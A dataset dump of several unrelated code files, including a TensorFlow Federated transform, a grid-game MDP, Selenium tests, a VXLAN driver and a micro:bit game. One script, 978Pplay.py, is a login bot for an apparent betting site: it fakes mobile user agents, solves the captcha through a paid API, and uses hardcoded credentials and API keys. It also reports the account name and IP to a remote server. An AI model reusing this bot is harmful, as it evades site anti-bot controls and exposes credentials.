TFF into TF, so we expect some constructs will fail\n to be reduced. The assumptions can currently be enumerated as follows:\n\n 1. All called lambdas have been converted to blocks.\n 2. All blocks have been inlined; that is, there are no block/LET constructs\n remaining.\n 3. All compiled computations are called.\n 4. No compiled computations have been partially called; we believe this\n should be handled correctly today but we haven't reasoned explicitly about\n this possibility.\n 5. The only leaf nodes present under `comp` are compiled computations and\n references to the argument of the top-level lambda which we are hoping to\n replace with a compiled computation. Further, every leaf node which is a\n reference has as its parent a `computation_building_blocks.Call`, whose\n associated function is a TF graph. This prevents us from needing to\n deal with arbitrary nesting of references and TF graphs, and significantly\n clarifies the reasoning. This can be accomplished by \"decorating\" the\n appropriate leaves with called identity TF graphs, the construction of\n which is provided by a utility module.\n 6. There is only a single lambda binding any references present in the AST,\n and it is placed at the root of the AST to which we apply `TFParser`.\n 7. There are no intrinsics present in the AST.\n \"\"\"\n\n # TODO(b/133328350): Allow for this to take in multiple selections from a\n # single argument.\n\n def __init__(self):\n \"\"\"Populates the parser library with mutually exclusive options.\"\"\"\n self._parse_library = [\n compiled_computation_transforms.SelectionFromCalledTensorFlowBlock(),\n compiled_computation_transforms.LambdaWrappingGraph(),\n compiled_computation_transforms.LambdaCallSelectionFromArg(),\n compiled_computation_transforms.LambdaToCalledTupleOfSelectionsFromArg(\n ),\n compiled_computation_transforms.TupleCalledGraphs(),\n compiled_computation_transforms.CalledCompositionOfTensorFlowBlocks(),\n compiled_computation_transforms.LambdaToCalledGraphOnReplicatedArg(),\n ]\n\n def __call__(self, comp):\n \"\"\"Transforms `comp` by checking all elements of the parser library.\n\n This function is roughly performing intermediate-code generation, taking\n TFF and generating TF. Calling this function is essentially checking the\n stack and selecting a semantic action based on its contents, and *only one*\n of these actions should be selected for a given computation.\n\n Notice that since the parser library contains mutually exclusive options,\n it is safe to return early.\n\n Args:\n comp: The `computation_building_blocks.ComputationBuildingBlock` to check\n for possibility of reduction according to the parsing library.\n\n Returns:\n A tuple whose first element is a possibly transformed version of `comp`,\n and whose second is a Boolean indicating whether or not `comp` was\n transformed. This is in conforming to the conventions of\n `transformation_utils.transform_postorder`.\n \"\"\"\n py_typecheck.check_type(\n comp, computation_building_blocks.ComputationBuildingBlock)\n for option in self._parse_library:\n if option.should_transform(comp):\n transformed, ind = option.transform(comp)\n return transformed, ind\n return comp, False\n\n\ndef _is_called_intrinsic(comp, uri=None):\n \"\"\"Returns `True` if `comp` is a called intrinsic with the `uri` or `uri`s.\n\n Call\n /\n Intrinsic\n\n Args:\n comp: The computation building block to test.\n uri: A uri or a list, tuple, or set of uri.\n \"\"\"\n if isinstance(uri, six.string_types):\n uri = (uri,)\n if uri is not None:\n py_typecheck.check_type(uri, (list, tuple, set))\n return (isinstance(comp, computation_building_blocks.Call) and\n isinstance(comp.function, computation_building_blocks.Intrinsic) and\n (uri is None or comp.function.uri in uri))\n\n\ndef _is_identity_function(comp):\n \"\"\"Returns `True` if `comp` is an identity function.\"\"\"\n return (isinstance(comp, computation_building_blocks.Lambda) and\n isinstance(comp.result, computation_building_blocks.Reference) and\n comp.parameter_name == comp.result.name)\n\n\ndef _check_has_unique_names(comp):\n if not transformation_utils.has_unique_names(comp):\n raise ValueError(\n 'This transform should only be called after we have uniquified all '\n '`computation_building_blocks.Reference` names, since we may be moving '\n 'computations with unbound references under constructs which bind '\n 'those references.')\n\n\ndef _get_unbound_references(comp):\n \"\"\"Gets a Python `dict` of the unbound references in `comp`.\n\n Compuations that are equal will have the same collections of unbounded\n references, so it is safe to use `comp` as the key for this `dict` even though\n a given compuation may appear in many positions in the AST.\n\n Args:\n comp: The computation building block to parse.\n\n Returns:\n A Python `dict` of elements where keys are the compuations in `comp` and\n values are a Python `set` of the names of the unbound references in the\n subtree of that compuation.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n references = {}\n\n def _update(comp):\n \"\"\"Updates the Python dict of references.\"\"\"\n if isinstance(comp, computation_building_blocks.Reference):\n references[comp] = set((comp.name,))\n elif isinstance(comp, computation_building_blocks.Block):\n references[comp] = set()\n names = []\n for name, variable in comp.locals:\n elements = references[variable]\n references[comp].update([e for e in elements if e not in names])\n names.append(name)\n elements = references[comp.result]\n references[comp].update([e for e in elements if e not in names])\n elif isinstance(comp, computation_building_blocks.Call):\n elements = references[comp.function]\n if comp.argument is not None:\n elements.update(references[comp.argument])\n references[comp] = elements\n elif isinstance(comp, computation_building_blocks.Lambda):\n elements = references[comp.result]\n references[comp] = set([e for e in elements if e != comp.parameter_name])\n elif isinstance(comp, computation_building_blocks.Selection):\n references[comp] = references[comp.source]\n elif isinstance(comp, computation_building_blocks.Tuple):\n elements = [references[e] for e in comp]\n references[comp] = set(itertools.chain.from_iterable(elements))\n else:\n references[comp] = set()\n return comp, False\n\n transformation_utils.transform_postorder(comp, _update)\n return references\n","sub_path":"tensorflow_federated/python/core/impl/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":47320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"282374725","text":"import numpy as np\nfrom model.coop_irl_mdp import CoopIRLMDP\nfrom collections import defaultdict\nimport json\n\n\nclass ColorTrails(CoopIRLMDP):\n action = {0: np.array([-1, 0]), # up\n 1: np.array([0, -1]), # left\n 2: np.array([0, 1]), # right\n 3: np.array([1, 0])} # down\n\n def __init__(self, ct_data):\n self.ct_data = ct_data\n self.t_map = defaultdict(lambda: defaultdict(dict))\n self.s_map = {}\n\n self.make_s_map_for_r(0, set(), self.s_map, self.t_map, ct_data.h_start, ct_data.r_start,\n ct_data.h_chip, ct_data.r_chip, 0)\n super().__init__(len(self.s_map) + 1, 5, 5, 2, 2)\n\n def valid_pos(self, pos):\n c = (pos >= np.array([0, 0])) * (pos < np.array(self.ct_data.shape))\n return np.prod(c)\n\n def make_s_map_for_r(self, s, medals, s_map, t_map, h_pos, r_pos, h_chip, r_chip, d):\n medals = medals.copy()\n if tuple(h_pos) in self.ct_data.medals:\n medals.add(self.ct_data.medals[tuple(h_pos)])\n if tuple(r_pos) in self.ct_data.medals:\n medals.add(self.ct_data.medals[tuple(r_pos)])\n\n bomb = -1\n if tuple(h_pos) in self.ct_data.bomb:\n bomb = self.ct_data.bomb[tuple(h_pos)]\n\n s_map[s] = (h_pos, r_pos, h_chip, r_chip, medals, self._finish_recipe(medals), bomb, d)\n s_offset = 0\n r_halt = True\n if tuple(r_pos) not in self.ct_data.medals:\n for a_r in range(4):\n n_r_pos = r_pos + ColorTrails.action[a_r]\n if not self.valid_pos(n_r_pos):\n continue\n chip = self.ct_data.color[n_r_pos[0], n_r_pos[1]]\n if r_chip[chip] <= 0:\n continue\n r_halt = False\n n_r_chip = r_chip.copy()\n n_r_chip[chip] -= 1\n s_offset += self.make_s_map_for_h(s, medals, a_r, s_offset, s_map, t_map,\n h_pos, n_r_pos, h_chip, n_r_chip, d)\n if r_halt:\n s_offset += self.make_s_map_for_h(s, medals, 4, s_offset, s_map, t_map,\n h_pos, r_pos, h_chip, r_chip, d)\n\n return s_offset\n\n def make_s_map_for_h(self, s, medals, a_r, s_offset, s_map, t_map,\n h_pos, n_r_pos, h_chip, n_r_chip, d):\n h_halt = True\n s_h_offset = 0\n if tuple(h_pos) not in self.ct_data.medals:\n for a_h in range(4):\n n_h_pos = h_pos + ColorTrails.action[a_h]\n if not self.valid_pos(n_h_pos):\n continue\n chip = self.ct_data.color[n_h_pos[0], n_h_pos[1]]\n if h_chip[chip] <= 0:\n continue\n h_halt = False\n n_h_chip = h_chip.copy()\n n_h_chip[chip] -= 1\n s_h_offset += 1\n\n # t_map[s].append((a_h, a_r, s + s_offset + s_h_offset))\n t_map[s][a_h][a_r] = s + s_offset + s_h_offset\n s_h_offset += self.make_s_map_for_r(s + s_offset + s_h_offset, medals, s_map, t_map,\n n_h_pos, n_r_pos, n_h_chip, n_r_chip, d + 1)\n if h_halt and a_r != 4:\n s_h_offset += 1\n t_map[s][4][a_r] = s + s_offset + s_h_offset\n s_h_offset += self.make_s_map_for_r(s + s_offset + s_h_offset, medals, s_map, t_map,\n h_pos, n_r_pos, h_chip, n_r_chip, d + 1)\n return s_h_offset\n\n def _finish_recipe(self, medals):\n recipe = set()\n for i, rs in enumerate(self.ct_data.recipe):\n for r in rs:\n if r.issubset(medals):\n recipe.add(i)\n break\n return recipe\n\n def _set_tro(self):\n for s, v in self.t_map.items():\n for a_h in range(5):\n if a_h not in v:\n self.t[:, a_h, s, -1] = 1\n self.r[:, a_h, s, :, :] = -1000\n else:\n for a_r in range(5):\n if a_r not in v[a_h]:\n self.t[a_r, a_h, s, -1] = 1\n self.r[a_r, a_h, s, :, :] = -1000\n else:\n ns = v[a_h][a_r]\n self.t[a_r, a_h, s, ns] = 1\n self.r[a_r, a_h, s, :, :] -= self.calc_cost(a_h, a_r)\n s_data = self.s_map[s]\n ns_data = self.s_map[ns]\n for recipe in ns_data[5]:\n if recipe not in s_data[5]:\n self.r[a_r, a_h, s, :, recipe] += 300\n if ns_data[6] != -1:\n self.r[a_r, a_h, s, ns_data[6], :] -= 100\n for s in self.s_map.keys():\n if s not in self.t_map:\n self.t[:, :, s, -1] = 1\n self.r[:-1, :, s, :] = -1000\n self.r[:, :-1, s, :] = -1000\n self.t[:, :, -1, -1] = 1\n\n # for k, v in self.s_map.items():\n # print(k, v)\n # # exit()\n #\n # for k, v in self.t_map.items():\n # print(k, v)\n # exit()\n\n def calc_cost(self, a_h, a_r):\n return (int(a_h != 4) + int(a_r != 4)) * 5\n\n def make_data(self):\n # medals = {v: k for k, v in self.ct_data.medals.items()}\n medals = np.zeros_like(self.ct_data.color)\n for k, v in self.ct_data.medals.items():\n medals[k] = v + 1\n bomb = np.zeros_like(self.ct_data.color)\n for k, v in self.ct_data.bomb.items():\n bomb[k] = v + 1\n recipe = [[list(r) for r in rs] for rs in self.ct_data.recipe]\n data = {\n \"color\": self.ct_data.color.tolist(),\n \"bomb\": bomb.tolist(),\n \"medals\": medals.tolist(),\n \"h_chip\": self.ct_data.h_chip.tolist(),\n \"r_chip\": self.ct_data.r_chip.tolist(),\n \"recipe\": recipe,\n \"h_start\": self.ct_data.h_start.tolist(),\n \"r_start\": self.ct_data.r_start.tolist(),\n }\n json.dump(data, open(\"ct_data/data_\" + str(self.ct_data.index) + \".json\", \"w\"), indent=4)\n\n def make_scinario(self, th_r, index, algo, target):\n conv_action = {0: 2, 1: 1, 2: 4, 3: 3, 4: 0}\n s_candi = set([0])\n b_map = {0: np.array([0.5, 0.5])}\n actions = {}\n nexts = {}\n while len(s_candi) > 0:\n s = s_candi.pop()\n b = b_map[s]\n a_r = self.a_vector_a[s][th_r]\n # print(a_r)\n # return np.max(np.dot(self.a_vector_a[s][th_r][a_r], b))\n # print(s, [np.dot(b, v.T)[0][0] for _k, v in sorted(a_r.items())])\n # print(s, [v for _k, v in sorted(a_r.items())])\n # print(s, [np.max(np.dot(b, v.T)) for _k, v in sorted(a_r.items())])\n # exit()\n # print(s, [np.dot(b, v.T) for _k, v in sorted(a_r.items())])\n # print(s, np.max(np.dot(b, v.T)[0])[0] for _k, v in sorted(a_r.items())])\n a_r = np.argmax([np.max(np.dot(b, v.T)) for _k, v in sorted(a_r.items())])\n\n # print(s, a_r)\n next = {}\n for a_h, v in self.t_map[s].items():\n n_s = v[a_r]\n b = self.h_pi[th_r][s][a_r][a_h] * b_map[s]\n b /= np.sum(b)\n b_map[n_s] = np.array(b)\n next[conv_action[a_h]] = n_s\n s_candi.add(n_s)\n if len(next) > 0:\n nexts[s] = next\n actions[s] = int(conv_action[a_r])\n # print(actions)\n json.dump({\"actions\": actions, \"nexts\": nexts, \"target\": target},\n open(\"ct_data/scinario_\" + str(index) + \"_\" + str(algo) + \".json\", \"w\"), indent=4)\n # json.dump(actions, open(\"ct_data/scinario_\" + str(index) + \"_\" + str(algo) + \".json\", \"w\"), indent=4)\n\n # print(b)\n # print(self.h_pi[th_r][s][a_r])\n\n def _take_one_turn(self):\n exit()\n\n\n\n","sub_path":"problem/ct/ct_data_mdp.py","file_name":"ct_data_mdp.py","file_ext":"py","file_size_in_byte":8156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"239040699","text":"from selenium.common.exceptions import NoSuchElementException\nimport pytest\nimport time\n\n\n@pytest.fixture\ndef selenium(selenium):\n selenium.implicitly_wait(10)\n selenium.maximize_window()\n return selenium\n\n\ndef test_banner_shows_and_hides(selenium, live_server):\n selenium.get(live_server.url)\n cookielaw_banner = selenium.find_element_by_id('CookielawBanner')\n\n # on click of the button, cookie set and banner hidden\n cookielaw_banner.find_element_by_class_name('btn').click()\n assert not cookielaw_banner.is_displayed()\n assert '1' == selenium.get_cookie('cookielaw_accepted')['value']\n\n # on come back, assert banner gone\n selenium.get(live_server.url)\n\n with pytest.raises(NoSuchElementException):\n selenium.find_element_by_id('CookielawBanner')\n\n\ndef test_banner_shows_and_hides_with_jquery(selenium, live_server):\n # now, with jQuery\n selenium.get('{}/?jquery=1'.format(live_server.url))\n cookielaw_banner = selenium.find_element_by_id('CookielawBanner')\n\n # on click of the button, cookie set and banner hidden\n cookielaw_banner.find_element_by_class_name('btn').click()\n time.sleep(1)\n assert not cookielaw_banner.is_displayed()\n assert '1' == selenium.get_cookie('cookielaw_accepted')['value']\n","sub_path":"tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"344088795","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/cecdaemon/__main__.py\n# Compiled at: 2018-09-22 03:14:19\n# Size of source mod 2**32: 121 bytes\n__doc__ = ' Main entry point\\n'\nfrom . import cecdaemon\n\ndef main():\n cecdaemon.run()\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/cechmate-0.0.8-py3-none-any/__main__.cpython-37.py","file_name":"__main__.cpython-37.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"519703938","text":"# Copyright 2017 Huawei Technologies Co., Ltd.\n# All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_config import cfg\nfrom oslo_log import log\n\nfrom neutron.plugins.ml2 import driver_api\nfrom neutron.plugins.ml2.drivers import type_vxlan\nfrom neutron_lib import exceptions as n_exc\n\nfrom tricircle.common import constants\n\nLOG = log.getLogger(__name__)\n\n\nclass VxLANTypeDriver(type_vxlan.VxlanTypeDriver):\n def __init__(self):\n super(VxLANTypeDriver, self).__init__()\n\n def get_type(self):\n return constants.NT_VxLAN\n\n def initialize(self):\n try:\n self._initialize(cfg.CONF.tricircle.vni_ranges)\n except n_exc.NetworkTunnelRangeError:\n LOG.exception(\"Failed to parse vni_ranges. \"\n \"Service terminated!\")\n raise SystemExit()\n\n def reserve_provider_segment(self, context, segment):\n res = super(VxLANTypeDriver,\n self).reserve_provider_segment(context, segment)\n res[driver_api.NETWORK_TYPE] = constants.NT_VxLAN\n return res\n\n def allocate_tenant_segment(self, context):\n res = super(VxLANTypeDriver,\n self).allocate_tenant_segment(context)\n res[driver_api.NETWORK_TYPE] = constants.NT_VxLAN\n return res\n\n def get_mtu(self, physical_network=None):\n pass\n","sub_path":"tricircle/network/drivers/type_vxlan.py","file_name":"type_vxlan.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"177671300","text":"import numpy as np\nimport json\nimport csv\nfrom itertools import izip\n\nfilename = open('data/processed.json')\ndata = json.load(filename)\n\ntitle = []\nkeywords = []\nwinner = []\n\nstr1 = \"\"\nfor i in data:\n if i['winner'] == True:\n str1 += 'True'+';'\n winner.append(str1)\n else:\n str1 += 'False'+';'\n winner.append(str1)\n str1=\"\"\n\nstr1 = \"\"\nfor i in data:\n if \"keywords\" in i:\n for x in i[\"keywords\"]:\n str1 += x[\"text\"]+\" \"\n keywords.append(str1)\n str1 = \"\"\n\nstr1 = \"\"\nfor i in data:\n str1 += i[\"tagline\"]+';'\n title.append(str1)\n str1=\"\"\n\nfo = open('cluster.csv','w')\nwith open('cluster.csv','w') as outcsv:\n writer= csv.writer(outcsv, delimiter =';')\n writer.writerows(izip(winner,title,keywords))\nfo.close()\n\n","sub_path":"cluster_parsing.py","file_name":"cluster_parsing.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"617604842","text":"# encoding: utf-8\n\nfrom selenium import webdriver\nimport time\nfrom PIL import ImageGrab\nfrom chaojiying import Chaojiying_Client\nimport random\nfrom config_data import deviceall\nimport requests\nimport re\nimport urllib.request\nimport base64\nfrom urllib import request,parse\nimport json\n\n\nclass filter():\n sign_up = 'https://890cp2.com/'\n def device_ua(self):\n ua_iphone = []\n ua_ipad = []\n with open(\"ua_iphone.txt\", 'r') as f:\n for line in f:\n # uaph = f.readline()\n line = line.strip().split('\\n')\n # print(line)\n ua_iphone.append(line[0])\n # print(ua_iphone)\n\n with open(\"ua_ipad.txt\", 'r') as a:\n for line in a:\n line = line.strip().split('\\n')\n ua_ipad.append(line[0])\n # print(ua_all)\n\n ua_ph = 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X; tr-TR) AppleWebKit/537.36 (KHTML, like Gecko) Version/10.1.1 Mobile/14B100 Safari/537.36 Puffin/5.2.0IP'\n ua_pa = random.choice(ua_ipad)\n\n xypad = {'x': 720, 'y': 475} # ipad(720,475,205,40)\n xypadp = {'x': 915, 'y': 475} # ipadpro(915,475,205,40)\n xy678 = {'x': 315, 'y': 430} # iphone6_7_8(320,475,205,40)\n xyx = {'x': 320, 'y': 430} # iphoneX(320,475,205,40)\n xy5 = {'x': 252, 'y': 430} # iphone5_se(235,510,205,40)\n xy678p = {'x': 375, 'y': 430} # iphone6_7_8plus(375,470,205,40)\n\n iphone5_se = {'width': 320, 'height': 568, 'ua': ua_ph, 'xy': xy5}\n iphone6_7_8 = {'width': 375, 'height': 667, 'ua': ua_ph, 'xy': xy678}\n iphone6_7_8plus = {'width': 414, 'height': 736, 'ua': ua_ph, 'xy': xy678p}\n iphoneX = {'width': 375, 'height': 812, 'ua': ua_ph, 'xy': xyx}\n ipad = {'width': 768, 'height': 1024, 'ua': ua_pa, 'xy': xypad}\n ipadPro = {'width': 1024, 'height': 1366, 'ua': ua_pa, 'xy': xypadp}\n\n deviceall = [iphone5_se, iphone6_7_8, iphone6_7_8plus, iphoneX, ipad,ipadPro] #\n\n return deviceall\n\n def setUp(self):\n device_all = self.device_ua()\n # self.device = random.choice(device_all)\n self.device = device_all[2]\n print(self.device)\n pixel_ratio = 3.0\n mobileEmulation = {\"deviceMetrics\": {\"width\": self.device['width'], \"height\": self.device['height'], \"pixelRatio\": pixel_ratio},\"userAgent\": self.device['ua']}\n options = webdriver.ChromeOptions()\n options.binary_location = \"C:/Users/moxi/Desktop/mychrome/Chrome/chrome.exe\"\n chrome_driver_binary = \"chromedriver.exe\"\n options.add_experimental_option('mobileEmulation', mobileEmulation)\n # self.driver = webdriver.Chrome(executable_path='chromedriver.exe', chrome_options=options)\n self.driver = webdriver.Chrome(chrome_driver_binary, options=options)\n self.driver.maximize_window()\n time.sleep(1)\n self.driver.get(self.sign_up)\n self.driver.implicitly_wait(30)\n\n def quit(self):\n self.driver.quit()\n\n def verify(self):\n for i in range(1, 3):\n time.sleep(2)\n self.driver.find_elements_by_class_name(\"am-modal-button\")[0].click()\n # self.driver.find_element_by_xpath('//div[@class=\"am-modal-button-group-h.am-modal-button-group-normal\"]/a').click()\n # self.driver.refresh()\n time.sleep(5)\n self.driver.find_elements_by_class_name(\"barTextButton___G3WVC\")[1].click()\n # self.driver.switch_to.frame(self.driver.find_element_by_xpath(\"//iframe[contains(@src,'/login')]\"))\n\n username =\"ti626\"\n pwd = \"zspQjn0d5Z\"\n print(\"User:\"+username)\n print(\"Pwd:\"+pwd)\n\n # user = self.driver.find_element_by_xpath('//input[@placeholder=\"请输入用户名\"]')\n user = self.driver.find_elements_by_xpath('//input[@type=\"text\"]')[0]\n time.sleep(2)\n user.clear()\n time.sleep(2)\n user.send_keys(username)\n passw = self.driver.find_element_by_xpath('//input[@type=\"password\"]')\n passw.send_keys(pwd)\n code = self.driver.find_elements_by_xpath('//input[@type=\"text\"]')[1]\n code.send_keys(\"\")\n\n time.sleep(1)\n\n x = self.device['xy']['x'] # 1872\n y = self.device['xy']['y'] # 688,438\n w = x + 205 # 275,230\n h = y + 40 # 50,38\n size = (x, y, w, h)\n img = ImageGrab.grab(size)\n img.save(\"C:/Users/moxi/Downloads/1.png\") # C:/Users/moxi/Downloads/1.png\n # img.show()\n\n time.sleep(5)\n\n # chaojiying = Chaojiying_Client('iwtay77', 'Iwt.ay77','ac212bb67ed8fce6a530514d9f478093') # 用户中心>>软件ID 生成一个替换 96001\n # im = open('C:/Users/moxi/Downloads/1.png', 'rb').read() # 本地图片文件路径 来替换 a.jpg 有时WIN系统须要//\n # yzm = chaojiying.PostPic(im, 1902)\n # print(yzm)\n # time.sleep(5)\n\n appkey = \"62a8949082d27515eeafbd101b64912a\"\n with open(\"C:/Users/moxi/Downloads/1.png\", 'rb') as f:\n base64_data = base64.b64encode(f.read())\n s = base64_data.decode()\n # print(s)\n\n textmob = {\n \"key\": appkey,\n \"codeType\": 4006,\n \"base64Str\": s\n }\n textmob = parse.urlencode(textmob).encode(encoding='utf-8')\n # print(textmob)\n\n req = urllib.request.Request(url=\"http://op.juhe.cn/vercode/index\", data=textmob)\n webpage = urllib.request.urlopen(req)\n html = webpage.read()\n res = json.loads(html)\n yzm = str(res[\"result\"])\n print(yzm)\n code.send_keys(yzm)\n time.sleep(2)\n self.driver.find_elements_by_xpath('//button[@class=\"color1___3wpTZ\"]')[0].click()\n print(i)\n if i == 1 :\n time.sleep(2)\n quit = self.driver.find_elements_by_xpath('//div[@class=\"am-tab-bar-tab\"]')[4]\n time.sleep(2)\n quit.click()\n time.sleep(1)\n self.driver.find_element_by_class_name(\"iconService___BeN5z\").click()\n time.sleep(1)\n self.driver.find_element_by_class_name(\"color1___3wpTZ\").click()\n time.sleep(1)\n self.driver.refresh()\n else:\n break\n\n time.sleep(2)\n url = \"http://200019.ip138.com/\"\n req = urllib.request.urlopen(url).read()\n # print(req)\n theIP = re.findall(r\"\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}.\\d{1,3}\", str(req))\n ip = theIP[0]\n print(\"your IP Address is: \", ip)\n time.sleep(2)\n response = requests.post(\n f\"http://47.75.184.28/api/imessage-server/imessage-restapi/external/markEmail?email={username}&ip={ip}\")\n print(response.status_code)\n time.sleep(2)\n # deviceToken = self.driver.execute_script(\"return localStorage.getItem('appDeviceToken')\")\n # print(deviceToken)\n\n sideNav_list = self.driver.find_elements_by_xpath('//div[@class=\"listItem___12frK\"]')\n sideNav =random.choice(sideNav_list)\n time.sleep(2)\n sideNav.click()\n time.sleep(2)\n self.driver.find_elements_by_class_name(\"theme1___341L1.undefined.button___3xxsI\")[0].click()\n time.sleep(2)\n self.driver.find_elements_by_class_name(\"buttonItem___2sWKk\")[2].click()\n time.sleep(2)\n self.driver.find_elements_by_class_name(\"iconRemove___3CKmq\")[0].click()\n time.sleep(7)\n # self.driver.find_element_by_xpath('//div[@class=\"theme1___341L1.undefined.button___3xxsI\"]').click()\n # time.sleep(2)\n self.driver.find_element_by_class_name(\"theme1___341L1.undefined.button___3xxsI\").click()\n time.sleep(2)\n self.driver.find_element_by_class_name(\"color1___3wpTZ\").click()\n time.sleep(2)\n # self.driver.find_element_by_xpath('//button[@data-position=\"bottom\"]').click()\n\n\nif __name__ == \"__main__\":\n F = filter()\n F.setUp()\n F.verify()\n F.quit()\n\n\n","sub_path":"978Pplay.py","file_name":"978Pplay.py","file_ext":"py","file_size_in_byte":8217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"254021024","text":"import cv2\nimport imutils\nfrom datetime import datetime,timedelta\nimport statistics\n\nprint(cv2.__version__)\n\ncascPath = './haarcascade_frontalface_default.xml'\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\n#video_capture = cv2.VideoCapture(0)\nvideo_capture = cv2.VideoCapture(\"./pessoas_caminhando.mp4\")\n\ntotal = 0\nfont = cv2.FONT_HERSHEY_SIMPLEX\ninitBB = None\n\ntotal = []\nnext_update = datetime.now() + timedelta(seconds=30)\naverage = 0\nmaximo = 0\n\ndef get_average():\n global next_update\n global total\n global average\n now = datetime.now()\n if now > next_update:\n next_update = now + timedelta(seconds=30)\n average = int(statistics.median(total))\n total = []\n \n return average\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = video_capture.read()\n if frame is None:\n break\n\n frame = imutils.resize(frame, width=700)\n (width, height, c) = frame.shape\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n flags=cv2.CASCADE_SCALE_IMAGE\n )\n\n #desenha os retangulos\n atual = 0\n for (x, y, w, h) in faces:\n atual = atual + 1\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n if atual > maximo:\n maximo = atual\n\n total.append(atual)\n\n cv2.putText(frame, \"Maximo: %s\" % maximo, (10, 20), font, 0.7, (255,165,0), 2, cv2.LINE_AA)\n\n average = get_average()\n\n cv2.putText(frame, \"Media (Mediana): %s\" % average, (10, 45), font, 0.7, (255,165,0), 2, cv2.LINE_AA)\n\n cv2.imshow('Video', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n# When everything is done, release the capture\nvideo_capture.release()\ncv2.destroyAllWindows()\n\n","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"172884944","text":"from microbit import *\nimport random\n\nbricksPos = []\n\nstep = 1\n\nclass Player:\n \"\"\"This is the play in the bottom\"\"\"\n def __init__(self, pos, HP):\n self.HP = HP\n self.pos = pos\n\n def shoot(self):\n \"\"\"Here a shot is being fired\"\"\"\n for n in [4,3,2,1,0]:\n \"\"\"If enemy is encountered\"\"\"\n shotPos = [self.pos[0],n-1]\n print(\"Shotpos\" + \" \" + str(shotPos))\n\n if shotPos in bricksPos:\n\n # Remove brick\n display.set_pixel(shotPos[0], shotPos[1], 0 )\n bricksPos.remove(shotPos)\n print(\"Brick is removed\" + str(bricksPos))\n break\n else:\n display.set_pixel(shotPos[0],n,9)\n sleep(100)\n display.set_pixel(shotPos[0], n, 0)\n\n\n def explode(self):\n \"\"\" Here a local explosion removes all nearby bricks\"\"\"\n\n combs = [\n [1, 0],\n [1, -1],\n [0, -1],\n [-1, 0],\n [-1, -1]\n ]\n # Lyser bombepixels\n for comb in combs:\n\n y = self.pos[1] + comb[1]\n x = self.pos[0] + comb[0]\n if -1 < x and x < 5 and -1 < y and y < 5:\n # bricks are removed\n display.set_pixel(x % 5, y % 5, 9)\n\n sleep(500)\n # Slukker igen\n for comb in combs:\n\n y = self.pos[1] + comb[1]\n x = self.pos[0] + comb[0]\n\n if -1 < x and x < 5 and -1 < y and y < 5:\n # bricks are removed\n display.set_pixel(x % 5, y % 5, 0)\n if [x % 5, y % 5] in bricksPos:\n bricksPos.remove([x % 5, y % 5])\n else:\n pass\n\n def move(self):\n if accelerometer.get_x() > 100:\n self.pos[0] = (self.pos[0] + 1) % 5\n elif accelerometer.get_x() < -100:\n self.pos[0] = (self.pos[0] - 1) % 5\n else:\n pass\n\nlukas = Player([2,4],9)\n# Game loop\nt = running_time()\nt_add = running_time()\nt_move = running_time()\n\nwhile True:\n if lukas.HP < 0:\n display.scroll(str(temperature()))\n display.scroll(\"GAME OVER\")\n\n\n # Setting character:\n display.set_pixel(lukas.pos[0],lukas.pos[1],lukas.HP)\n cols =[0, 1, 2, 3, 4]\n\n\n\n t_break = 3000*(0.95)**step\n while t_add + t_break < running_time():\n x = random.choice(cols)\n newBrickPos = [x,0]\n step += 1\n\n for brick in bricksPos:\n if brick == newBrickPos:\n # setting new brick\n if brick[1]+1 == 5:\n display.clear()\n lukas.HP -= 1\n bricksPos = []\n brick = [0,0]\n display.set_pixel(brick[0],brick[1]+1,5)\n\n newBrickPos[1] +=1\n\n else:\n # do nothing\n pass\n display.set_pixel(x,0,5)\n bricksPos.append(newBrickPos)\n\n t_add = running_time()\n\n while t_move + 300 < running_time():\n display.set_pixel(lukas.pos[0],lukas.pos[1],0)\n lukas.move()\n display.set_pixel(lukas.pos[0], lukas.pos[1], lukas.HP)\n t_move = running_time()\n\n if button_a.was_pressed():\n lukas.shoot()\n if button_b.was_pressed():\n 